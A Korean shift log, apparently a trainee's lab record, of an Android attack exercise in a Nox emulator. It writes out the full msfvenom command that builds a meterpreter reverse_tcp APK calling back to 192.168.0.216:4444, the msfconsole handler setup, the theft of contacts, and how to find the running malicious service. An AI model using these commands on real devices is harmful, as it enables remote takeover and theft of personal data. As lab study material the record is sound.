🕐 관제 근무 시간: 2026-08-06 15:06:00 ~ 2026-08-06 16:06:00

msfvenom을 이용한 안드로이드 공격 실습

📋 근무 작업 내역
msfvenom을 이용해 페이로드를 제작해 악성 설치파일(hello.apk)를 생성하여 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.216 LPORT=4444 -o payload.apk 녹스 애뮬레이터에서 악성코드를 실행 시킨다. 그 후 리스너를 실행하고 악성코드가 실행되는걸 기다린다. msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.216 set LPORT 4444 run
🚨 탐지 현황 요약
악성코드가 실행되면 reverse_tcp 공격을 수행하여 공격자의 서버로 안드로이드가 연결된다. 그곳에서 meterpreter를 이용해 다양한 명령을 수행할 수 있다. 이번 실습에서는 연락처를 획득하는 실습을 진행했다.
⚠️ 특이사항 및 조치 결과
악성코드는 항상 프로세스가 죽지 않고 실행된다. 따라서 현재 실행중인 서비스를 확인해본다. 악성코드가 실행중인 녹스 기기에 들어가서 설정-시스템-태블릿정보-빌드 번호를 7번 클릭하면 개발자모드가 활성화 된다 그 상태로 설정-시스템-개발자 옵션-실행 중인 서비스 에 가면 만들었던 악성코드가 실행중임을 알 수 있다.
🔎 연동된 상세 침해사고 분석 보고서
아직 연동된 상세 기술 분석 보고서가 없습니다.